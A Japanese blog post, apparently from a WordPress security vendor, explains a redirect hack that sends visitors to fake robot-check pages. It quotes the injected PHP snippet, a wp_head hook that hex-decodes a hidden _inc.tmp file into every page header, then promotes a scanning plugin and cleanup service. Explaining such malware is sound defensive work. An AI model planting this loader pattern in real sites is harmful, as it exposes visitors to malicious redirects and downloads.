ワードプレスサイトがロボット確認用の別のサイトに勝手に飛ばされるリダイレクトハックの事例が昨今増えています。このマルウェア埋め込みの事例と対処方法をご紹介いたします。

マルウェアの特徴と症状

このマルウェアは下記のようなコードで、ワードプレスサイトのヘッダーに不正なJAVASCRIPTコードを埋め込み、サイトにアクセスしてきたユーザーをロボット確認用の偽のページに飛ばしてしまいます。
このようなマルウェアのタイプをリダイレクトハックと呼びます。

add_action('wp_head', 'get_hex_cache', 12);
function get_hex_cache()
{
    return print(@hex2bin( '数字' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
}

このコードは、ワードプレスのヘッダー出力に割り込む処理で、inc.tmp という不正なコード本体を読み込んでサイトの全ページのヘッダーにマルウェアを埋め込んできます。

このマルウェアの不正なコードによってguesswhatnewsコム というドメインに飛ばされることが多く、サイトのコンテンツが閲覧不能になるため、ユーザーはコンテンツを見ることもできず、飛ばされた先の不正なページにてウィルスのインストールなどを誤って行ってしまう可能性もございます。

マルウェアを検出駆除する

このマルウェアは、サイト上のテーマやプラグイン、コアファイルのあらゆる場所に不正なコードを埋め込むため、発見は容易ではございません。

【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

をご利用いただくと、検出と駆除が可能となっております。
お試しいただけましたら幸いです。

WordPress ワードプレスのマルウェア駆除を経験豊かな専門家が代行したします。お気軽にご依頼・ご相談お送りください。

関連記事:

  1. ワードプレス 稀に、Google検索結果からのみサイトが別のサイトに飛ばされるリダイレクトハック
    ワードプレスが検索エンジンからの検索結果からジャンプしたときのみ、稀に(スマホだけというパターンもあります)別の不正なサイトに強制的に移動してしまうリダイレクトハックの解説と対処方法について解説いたします。...
  2. ワードプレス一部のURLのみロシアの通販サイトにリダイレクトする新種のマルウェア
    ワードプレスの一部の階層のURLのみロシアの通販サイトにリダイレクトする新種のマルウェアを発見しましたのでその事例をご紹介いたします。...
  3. サイトが別サイトに飛んでしまうリダイレクトハックのデータベース改ざん事例
    サイトが別サイト(多くの場合、不正なソフトウェアのダウンロードや偽のECサイト、ロボット認証をクリックさせるサイトなどになります)に飛んでしまうリダイレクトハックは、ファイルの改ざんだけでなく、データベースに入り込んでいることがございます。 データベースのマルウェアによる改ざん事例と対処方法をいくつかご紹介いたします。...
  4. ワードプレスのハッキングされたらどんな症状が出る?様々なハッカーの改ざん内容をご紹介します。
    1 バックドア バックドアと呼ばれる脆弱性は、ハッカーがサイト上に隠れた侵入口を設置し WordPress...
  5. プラグインやテーマ、ワードプレスの更新(アップデート)が困難な場合のセキュリティー対策
    ワードプレスサイトのプラグインやテーマ、本体は更新(アップデート)すると、コードが上書きされてしまいますので、何らかのカスタマイズをしている場合は更新が難しい場合があります。 また、上記の更新(アップデート)をすると、動作不具合が出る可能性もあることから、サイトの製作者様に更新しないよう止められているサイト様が多いのも事実です。 こういった更新ができないサイト様でできるだけワードプレスのセキュリティーを向上させる方法をいくつかご紹介したいと存じます。...
  6. ワードプレスが改ざんされたときに不正なJAVASCRIPTコードが埋め込まれるファイル10選
    ワードプレスで作成したサイトが、アクセスすると別のサイトに飛んでしまう(リダイレクト)、リダイレクトハックのコードがよく埋め込まれるファイルについて解説いたします。...